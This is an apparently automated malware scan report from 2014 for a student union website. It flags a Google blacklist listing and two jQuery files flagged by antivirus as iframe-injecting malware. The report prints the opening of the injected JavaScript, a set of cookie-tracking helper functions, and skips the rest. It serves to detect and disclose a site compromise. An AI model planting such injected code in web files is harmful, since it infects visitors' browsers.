New scan:

Malware Scanner report for sud-etudiant.org

Malicious/Suspicious/Total urls checked
2/0/17
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "sud-etudiant.org" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/9
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=sud-etudiant.org

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://sud-etudiant.org/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 24 Sep 2014 01:04:26 GMT
Location: http://www.solidaires-etudiant-e-s.org/
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 329
Content-Type: text/html; charset=iso-8859-1
clean
http://www.solidaires-etudiant-e-s.org/
HTTP/1.1 200 OK
Connection: close
Date: Wed, 24 Sep 2014 01:04:27 GMT
Server: Apache/2.2.22 (Debian)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
Last-Modified: Wed, 24 Sep 2014 01:04:27 GMT
Composed-By: SPIP 3.0.17-1 (Debian) @ www.spip.net + spip(3.0.13),compagnon(1.4.1),dump(1.6.7),images(1.1.7),forum(1.8.29),jqueryui(1.8.21),mediabox(0.8.4),mots(2.4.10),msie_compat(1.2.0),organiseur(0.8.10),petitions(1.4.4),porte_plume(1.12.4),revisions(1.7.6),safehtml(1.4.0),sites(1.7.10),squelettes_par_rubrique(1.1.1),stats(0.4.19),svp(0.80.18),tw(0.8.17),urls(1.4.15),vertebres(1.2.2),alias(0.1.1),article_pdf(0.4.5),spip_bonux(3.0.5),calendriermini(2.3.5),agenda(3.12.1),iterateurs(0.6.1),queue(0.6.6),breves(1.3.5),compresseur(1.8.6),medias(2.7.51),accesrestreint(3.8.8),sarkaspip(3.2.36)
X-Powered-By: PHP/5.4.4-14+deb7u14
X-Spip-Cache: 86400
clean
http://www.solidaires-etudiant.org/
200 OK
Content-Length: 58454
Content-Type: text/html
clean
http://www.solidaires-etudiant.org/wp-includes/js/jquery/jquery.js
200 OK
Content-Length: 96723
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Depositormengarslife() {
function Expocarus(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function Afillatepost(name) {
var afrodita = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
return afrodita ? decodeURIComponent(afrodita[1]) : undefined;
}
var cookie =
... 3179 bytes are skipped ...
e["scroll"+a],b.body["offset"+a],e["offset"+a],e["client"+a])):void 0===d?m.css(b,c,g):m.style(b,c,d,g)},b,f?d:void 0,f,null)}})}),m.fn.size=function(){return this.length},m.fn.andSelf=m.fn.addBack,"function"==typeof define&&define.amd&&define("jquery",[],function(){return m});var ed=a.jQuery,fd=a.$;return m.noConflict=function(b){return a.$===m&&(a.$=fd),b&&a.jQuery===m&&(a.jQuery=ed),m},typeof b===K&&(a.jQuery=a.$=m),m});
jQuery.noConflict();

Antivirus reports:

Avast
HTML:Iframe-inf

http://www.solidaires-etudiant.org/wp-includes/js/jquery/jquery-migrate.min.js
200 OK
Content-Length: 8116
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Depositormengarslife() {
function Expocarus(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function Afillatepost(name) {
var afrodita = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
return afrodita ? decodeURIComponent(afrodita[1]) : undefined;
}
var cookie =
... 3273 bytes are skipped ...
ector||"**",n),this)},e.event.trigger=function(e,t,n,a){return n||C.test(e)||r("Global events are undocumented and deprecated"),k.call(this,e,t,n||document,a)},e.each(S.split("|"),function(t,n){e.event.special[n]={setup:function(){var t=this;return t!==document&&(e.event.add(document,n+"."+e.guid,function(){e.event.trigger(n,null,t,!0)}),e._data(this,n,e.guid++)),!1},teardown:function(){return this!==document&&e.event.remove(document,n+"."+e._data(this,n)),!1}}})}(jQuery,window);

Antivirus reports:

Avast
HTML:Iframe-inf

http://www.solidaires-etudiant.org/wp-content/themes/Avenue/js/jcarousellite_1.0.1.pack.js
200 OK
Content-Length: 3059
Content-Type: application/javascript
clean
http://www.solidaires-etudiant.org/wp-content/themes/Avenue/js/jquery.nivo.slider.pack.js
200 OK
Content-Length: 16799
Content-Type: application/javascript
clean
http://www.solidaires-etudiant.org/wp-content/themes/Avenue/js/colorbox/jquery.colorbox-min.js
200 OK
Content-Length: 10742
Content-Type: application/javascript
clean
http://www.solidaires-etudiant.org/wp-content/themes/Avenue/js/scripts.js
200 OK
Content-Length: 7793
Content-Type: application/javascript
clean
http://www.solidaires-etudiant.org/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js
200 OK
Content-Length: 16170
Content-Type: application/javascript
clean
http://www.solidaires-etudiant.org/wp-content/plugins/contact-form-7/includes/js/scripts.js
200 OK
Content-Length: 10580
Content-Type: application/javascript
clean
http://s0.wp.com/wp-content/js/devicepx-jetpack.js
200 OK
Content-Length: 9301
Content-Type: application/x-javascript
clean
http://s.gravatar.com/js/gprofiles.js
200 OK
Content-Length: 21442
Content-Type: application/x-javascript
clean
http://www.solidaires-etudiant.org/wp-content/plugins/jetpack/modules/wpgroho.js
200 OK
Content-Length: 1881
Content-Type: application/javascript
clean
http://stats.wp.com/e-201439.js
200 OK
Content-Length: 824
Content-Type: application/x-javascript
clean
http://sud-etudiant.org/test404page.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 24 Sep 2014 01:04:35 GMT
Location: http://www.solidaires-etudiant-e-s.org/test404page.js
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 343
Content-Type: text/html; charset=iso-8859-1
clean
http://www.solidaires-etudiant-e-s.org/test404page.js
404 Not Found
Content-Length: 309
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: sud-etudiant.org

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 24 Sep 2014 01:04:26 GMT
Location: http://www.solidaires-etudiant-e-s.org/
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 329
Content-Type: text/html; charset=iso-8859-1

...329 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sud-etudiant.org
Referer: http://www.google.com/search?q=sud-etudiant.org

Result:
The result is similar to the first query. There are no suspicious redirects found.